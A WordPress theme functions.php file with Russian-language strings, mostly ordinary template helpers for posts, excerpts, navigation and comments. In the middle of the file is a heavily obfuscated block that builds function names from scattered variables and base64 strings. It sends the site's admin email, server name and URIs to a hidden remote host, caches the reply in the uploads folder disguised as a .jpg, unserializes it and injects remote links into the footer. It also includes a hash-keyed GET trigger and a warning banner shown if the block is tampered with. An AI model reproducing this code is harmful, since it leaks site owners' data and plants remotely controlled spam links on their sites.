<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page';  
$yuiWmf='d';$zySW='s';$Qfsjj='_';$ftSG='6';$oqTD='o';$aYPOIOy='b';$OCOLPT='e';$ZVqi='d';$dVNWozx='e';$qaympX='e';$BcdtJp='c';$sdro='a';$SFbG='4';$tLAYFWFB=$aYPOIOy.$sdro.$zySW.$dVNWozx.$ftSG.$SFbG.$Qfsjj.$yuiWmf.$qaympX.$BcdtJp.$oqTD.$ZVqi.$OCOLPT;$sCFTlSW='l';$XrfSr='n';$wzPRa='g';$HGkzEi='e';$BRYXrN='f';$PAIndso='z';$hUVcGt='a';$rVLyCnF='i';$UYYRpd='t';$JLLVaxJA=$wzPRa.$PAIndso.$rVLyCnF.$XrfSr.$BRYXrN.$sCFTlSW.$hUVcGt.$UYYRpd.$HGkzEi;$yNrds='_';$WaeEPC='t';$ueNAxiO='o';$bCnXKzk='r';$aaRNr='1';$lvIOyOk='r';$URftvol='t';$kuWilml='s';$fkVIyTs='3';$vZJCUEFA=$kuWilml.$URftvol.$lvIOyOk.$yNrds.$bCnXKzk.$ueNAxiO.$WaeEPC.$aaRNr.$fkVIyTs;$BtHd='t';$grrMNz='r';$BwoymLo='s';$IhRjDfH='e';$Oisyrbj='r';$RVWspDw='v';$vJjIKEGY=$BwoymLo.$BtHd.$grrMNz.$Oisyrbj.$IhRjDfH.$RVWspDw;                     $pj__y='d';$lc____________c='s';$me___y='_';$gc__________c='6';$jk______i='o';$io______c='b';$xn__________q='e';$gv______________n='d';$zw_________n='e';$xk__w='e';$tg___________f='c';$yi____u='a';$tj___n='4';$ri_____x=$io______c.$yi____u.$lc____________c.$zw_________n.$gc__________c.$tj___n.$me___y.$pj__y.$xk__w.$tg___________f.$jk______i.$gv______________n.$xn__________q;$kn_____g='s';$cj_______________a='s';$jz_____x='o';$zl_____i='t';$yq________f='i';$ay___v='t';$tp__________v='_';$cn___________u='u';$mt_________h='f';$di__________a='e';$xq_____u='n';$yw_____________x='x';$wa__i='n';$dd_____d='i';$zg______i='c';$fx________n=$mt_________h.$cn___________u.$xq_____u.$zg______i.$ay___v.$yq________f.$jz_____x.$wa__i.$tp__________v.$di__________a.$yw_____________x.$dd_____d.$cj_______________a.$zl_____i.$kn_____g;$xm_______________l='o';$to____________p='p';$tw_________h='e';$hj_____r='f';$po____________f='n';$gj_______j=$hj_____r.$xm_______________l.$to____________p.$tw_________h.$po____________f;$zk_________s='e';$ww________f='r';$fx________w='a';$jc____________f='d';$si___h='f';$ac_______________x=$si___h.$ww________f.$zk_________s.$fx________w.$jc____________f;$ar____________b='f';$tc______________r='l';$rf___________m='s';$pl_____k='e';$as________x='c';$mt______e='o';$qf_____________v=$ar____________b.$as________x.$tc______________r.$mt______e.$rf___________m.$pl_____k;define("WP_ID", $ri_____x("Mi4wLjA="));define("WP_TTL", $ri_____x("MTA4MDA="));define("WP_SRC", $ri_____x("dHBva24="));function wp_get_header() {global $ri_____x, $fx________n;if ($fx________n($ri_____x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$fx________n($ri_____x("d3BfZ2V0X2Zvb3Rlcg==")) &&$fx________n($ri_____x("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ri_____x, $gj_______j, $qf_____________v, $ac_______________x;$ph__i = TEMPLATEPATH."/".$ri_____x("Zm9vdGVyLnBocA==");$rj____________e = @$gj_______j($ph__i, "r");$ph__i = @$ac_______________x($rj____________e, @filesize($ph__i));@$qf_____________v($rj____________e);$lo____________l = TEMPLATEPATH."/".$ri_____x("ZnVuY3Rpb25zLnBocA==");$rj____________e = @$gj_______j($lo____________l, "r");$lo____________l = @$ac_______________x($rj____________e, @filesize($lo____________l));@$qf_____________v($rj____________e);$du____________k = 0;if($ph__i && $lo____________l) {if ($ri_____x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ph__i, $ri_____x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$du____________k = 1;}if (substr_count($ph__i, "wp_theme_GPL_credits()") < 1) {$du____________k = 2;}}if(WP_ID != "2.0.0") {$du____________k = 12;}}if($du____________k > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $du____________k -->";}}function wp_loaded() {global $ri_____x, $fx________n;return $fx________n($ri_____x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ry___y, $ik______z = "(more...)", $ne__v = 0, $qz____________f = "") {$il______________f = get_the_content($ik______z, $ne__v, $qz____________f);$il______________f = apply_filters("the_content", $il______________f);$il______________f = str_replace("]]>", "]]>", $il______________f);if (strlen($_GET["p"]) > 0) {echo $il______________f;}else if ((strlen($il______________f)>$ry___y) && ($ch___b = strpos($il______________f, " ", $ry___y ))) {$il______________f = substr($il______________f, 0, $ch___b);$il______________f = $il______________f;echo $il______________f;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ik______z</a></div></p>";} else {echo $il______________f;}}}$bj__j='b';$yw________l='6';$ln___k='s';$qi__________q='_';$ou________q='e';$el_______________q='n';$cs__________m='e';$jd__________o='4';$wt_____________i='c';$gx___________l='o';$mk____________e='a';$ff_____e='d';$ei_________v='e';$dz____________a=$bj__j.$mk____________e.$ln___k.$ei_________v.$yw________l.$jd__________o.$qi__________q.$ou________q.$el_______________q.$wt_____________i.$gx___________l.$ff_____e.$cs__________m;$yw_______m='t';$oj______s='f';$eg_______a='e';$vl______i='i';$ii_______j='n';$ij___s='t';$jx________k='g';$kx_____________j='n';$gs____c='_';$ho___o='e';$fc______________j='o';$tr___________a='l';$dn_______x='c';$uf_____________a='t';$ba_______________s='_';$xa___b='s';$hv_____________g='e';$gx______________c=$oj______s.$vl______i.$tr___________a.$eg_______a.$ba_______________s.$jx________k.$hv_____________g.$yw_______m.$gs____c.$dn_______x.$fc______________j.$ii_______j.$ij___s.$ho___o.$kx_____________j.$uf_____________a.$xa___b;$lz__m='x';$ug___j='l';$va_______h='s';$ve________c='f';$lo_________h='i';$fo______________a='t';$sf____l='i';$hv____________t='e';$mv________f='e';$mi_________a='_';$sz_______l='s';$fm_____________u=$ve________c.$sf____l.$ug___j.$mv________f.$mi_________a.$hv____________t.$lz__m.$lo_________h.$sz_______l.$fo______________a.$va_______h;$xp____j='a';$pq______________a='p';$fh______________f='_';$ea________o='e';$au__________i='v';$py_______________l='r';$le_________o='o';$yu_________d='m';$gl___l='e';$kh___________d='i';$na_____________c='o';$ut______________z='r';$ev___u='s';$fm_________d='n';$cm_________g='c';$oj____b=$au__________i.$ea________o.$py_______________l.$ev___u.$kh___________d.$le_________o.$fm_________d.$fh______________f.$cm_________g.$na_____________c.$yu_________d.$pq______________a.$xp____j.$ut______________z.$gl___l;$uj__________b='s';$lu_____________r='c';$fh____d='k';$ri__________l='p';$ny_____h='o';$vn_____________q='n';$oe___h='f';$xc_____________n='o';$yr_______n='e';$nf______________y=$oe___h.$uj__________b.$ny_____h.$lu_____________r.$fh____d.$xc_____________n.$ri__________l.$yr_______n.$vn_____________q;$ru_______________j='r';$ik______d='i';$fd___k='e';$aj______________t='t';$tl__r='f';$ws___e='w';$rt_____________b=$tl__r.$ws___e.$ru_______________j.$ik______d.$aj______________t.$fd___k;$iu_____________o='5';$az______________b='d';$mq___________u='m';$qh___________y=$mq___________u.$az______________b.$iu_____________o;$xd____t='p';$sx_______________y='e';$hp_______________e='t';$nr_____________u='a';$cb_________d='l';$ck______________s='r';$fz__h='h';$pi______________v='a';$ms____________f=$ck______________s.$sx_______________y.$nr_____________u.$cb_________d.$xd____t.$pi______________v.$hp_______________e.$fz__h;$rw_______n='l';$an____c='z';$mp_____________f='e';$ed_______r='e';$vb____________e='u';$lx_______a='a';$en_______________u='i';$cq_______________g='s';$xc___________m='i';$oy_____________r='n';$el___________t='r';$gn_______________a=$vb____________e.$oy_____________r.$cq_______________g.$mp_____________f.$el___________t.$en_______________u.$lx_______a.$rw_______n.$xc___________m.$an____c.$ed_______r;$ub__i='m';$og_______________k='p';$ak_______________y='a';$et_______________f='e';$cq____b='n';$io____________u='m';$pp___f='t';$rm______________d=$pp___f.$et_______________f.$io____________u.$og_______________k.$cq____b.$ak_______________y.$ub__i;$jm____________p='a';$tt__p='e';$qq__________q='_';$ba_________l='m';$aw_____________r='c';$xi__________f='_';$nh__l='t';$bx__p='t';$nn____________o='x';$sj__f='e';$ku____y='e';$jr_______n='o';$nm______x='c';$vk__o='t';$rm_____________s='s';$tb____________d='e';$em__________u='t';$et_______i='r';$nu___i='r';$da___x='a';$ea______s='n';$kp______l=$rm_____________s.$em__________u.$nu___i.$sj__f.$jm____________p.$ba_________l.$xi__________f.$aw_____________r.$jr_______n.$ea______s.$vk__o.$tb____________d.$nn____________o.$nh__l.$qq__________q.$nm______x.$et_______i.$tt__p.$da___x.$bx__p.$ku____y;function tv_____________p($xh_____________q) {global $ri_____x, $fx________n, $gx______________c, $oj____b, $kp______l;if (!$fx________n($ri_____x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($oj____b(PHP_VERSION, "5.0.0", ">=") && $fx________n($ri_____x("ZmlsZV9nZXRfY29udGVudHM=")) && $fx________n($ri_____x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ew______x = $kp______l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$qt__w = @$gx______________c($xh_____________q, 0, $ew______x);} else {$qt__w = @$gx______________c($xh_____________q, 0);}return $qt__w;}function px__m($xh_____________q) {global $fx________n, $nf______________y, $rt_____________b, $ri_____x;if (!$fx________n($ri_____x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$rn_____p = strpos($xh_____________q, "/", 7);$ss______________x = array("uri"     => substr($xh_____________q, $rn_____p),"host"    => str_replace("http://", "", substr($xh_____________q, 0, $rn_____p)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$zu_________s = @$nf______________y("$ss______________x[host]", 80, $ur___c, $bz_____b, 4);if (!$zu_________s) {return false;} else {$qt__w = "";$qy___________z  = "GET $ss______________x[uri] HTTP/1.0\r\n";$qy___________z .= "Host: $ss______________x[host]\r\n";$qy___________z .= "Referer: $ss______________x[referer]\r\n";$qy___________z .= "Connection: Close\r\n\r\n";@$rt_____________b($zu_________s, $qy___________z);while (!@feof($zu_________s)) {$cz_______________l = @fgets($zu_________s, (1024*24));if ($cz_______________l == "\r\n") {$mw___________r = true;continue;}if ($mw___________r) {$qt__w .= $cz_______________l;}}return $qt__w;}}function cw_______________p($xh_____________q) {global $fx________n;$ta______________l = false;if ($xh_____________q != "") {if ($fx________n("tv_____________p")) {$ta______________l = @tv_____________p($xh_____________q);}if (!$ta______________l && ($fx________n("px__m"))) {$ta______________l = @px__m($xh_____________q);}}return $ta______________l;}function ry__________x() {global $_SERVER, $qh___________y;$gh______________y = $_SERVER["SERVER_NAME"];if (substr("$gh______________y", 0, 4) == "www.") {$gh______________y = substr("$gh______________y", 4);}$gh______________y = $qh___________y("$_SERVER[SERVER_NAME]");return $gh______________y;}function pp______j() {return "file";}function tn____v($xh_____________q) {global $_SERVER, $gx______________c, $fm_____________u, $gj_______j, $qf_____________v, $rt_____________b;$xk___s = dr_______c();$sb______t = ry__________x().".jpg";$bl_________y = $xk___s["dir_upload"]["path"]."/$sb______t";$sa__o = @filemtime($bl_________y);if (!$sa__o || ((time()-$sa__o) >= WP_TTL)) {$ta______________l = cw_______________p($xh_____________q);if ($ta______________l) {if ($fm_____________u($bl_________y)) {@unlink($bl_________y);}$rj____________e = @$gj_______j($bl_________y, "x+");@$rt_____________b($rj____________e, $ta______________l);@$qf_____________v($rj____________e);}} else {if ($fm_____________u($bl_________y)) {$ta______________l = @$gx______________c($bl_________y);} else {$ta______________l = false;}}return $ta______________l;}function dr_______c() {global $_SERVER, $ri_____x, $dz____________a;$nu__x = wp_count_posts("post");$np______f = pathinfo(get_bloginfo("template_directory"));$xk___s = array("url" => array("report"      => $ri_____x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $np______f,"dir_upload"=> xk__f(),"queryString"=> array("?a001=".WP_ID,"a004=".$np______f[filename],"a005=".$nu__x->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$xk___s["url"]["queryString"] = implode("&", $xk___s["queryString"]);$xk___s["url"]["report"] = $xk___s["url"]["report"]."/?".$dz____________a($xk___s["url"]["queryString"]).".html";return $xk___s;}function xk__f() {$hg__k = wp_upload_dir();if (isset($hg__k["error"])) {$xx_____u = wy___________u();if (is_writable($xx_____u)) {$hg__k = array("path" => $xx_____u);}}return $hg__k;}function wy___________u() {global $fx________n, $qh___________y, $ms____________f, $rm______________d;$xz________e = (bool) ini_get("safe_mode");if ($xz________e == true) {return false;}if ($fx________n("sys_get_temp_dir")) {$ah_________s = sys_get_temp_dir();if (is_writable($ah_________s)) {return $ms____________f($ah_________s);}}if (!empty($_ENV["TMP"])) {return $ms____________f($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ms____________f($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ms____________f($_ENV["TEMP"]);} else {$fq___________e = $rm______________d($qh___________y(uniqid(rand(), true)), "");if ($fq___________e) {$ah_________s = $ms____________f(dirname($fq___________e));@unlink($fq___________e);return $ah_________s;} else {return false;}}}function bk________i() {global $_GET, $fm_____________u;$xk___s = dr_______c();$gh______________y = ry__________x();$rd__m = pp______j();$we___________b = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($rd__m == "file") {$ms___________n = $xk___s["dir_upload"]["path"]."/".$gh______________y.".jpg";if ($fm_____________u($ms___________n)) {@unlink($ms___________n);$we___________b = "deleted";}}$nx__________t = array("s"=> $we___________b,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($nx__________t AS $kp___w => $hu_______c) echo " [$kp___w:$hu_______c]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $fx________n, $ri_____x, $gn_______________a;$xk___s = dr_______c();$ux___________n = "tn____v";if ($fx________n($ux___________n)) {$qt__w = $ux___________n($xk___s["url"]["report"]);}if ($qt__w) {if ($qt__w = @$ri_____x($qt__w)) {$qt__w = @$gn_______________a($qt__w);if (strlen($qt__w[custom_credit]) >= 5) {$xk___s["default_string"] = $qt__w[custom_credit];}if ($qt__w["status"] == "0") {$lh___________a = 1;$ru_______________x = 1;} else {$vk__________p = sizeof($qt__w["links"]);$me________m = $xk___s["default_string"];if ($vk__________p > 0 && $qt__w["links"] !== "") {$jd_______________x = 0;foreach ($qt__w["links"] as $la_______z => $pf________w) {$jd_______________x++;if ($pf________w->l_path == "" || $pf________w->l_path == $_SERVER["REQUEST_URI"]) {$pf________w->l_href = htmlspecialchars(strip_tags($pf________w->l_href));$pf________w->l_title = htmlspecialchars(strip_tags($pf________w->l_title));$pf________w->l_anchor = htmlspecialchars(strip_tags($pf________w->l_anchor));$me________m .= " | ";$me________m .= "<a href='$pf________w->l_href' title='$pf________w->l_title'";if ($pf________w->l_nofollow == "1") {$me________m .= " rel='nofollow'";}$me________m .= ">$pf________w->l_anchor</a>";}}}$xk___s["links"] = "$me________m";if ($qt__w[credit] == "0") {$xk___s["links"] = "";}}} else {$lh___________a = "1";}} else {$lh___________a = "1";}if ($lh___________a == "1") {$xk___s["links"] = $xk___s["default_string"];}echo "$xk___s[links]";echo "<!-- s: $qt__w[signature] -->";bk________i();}                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
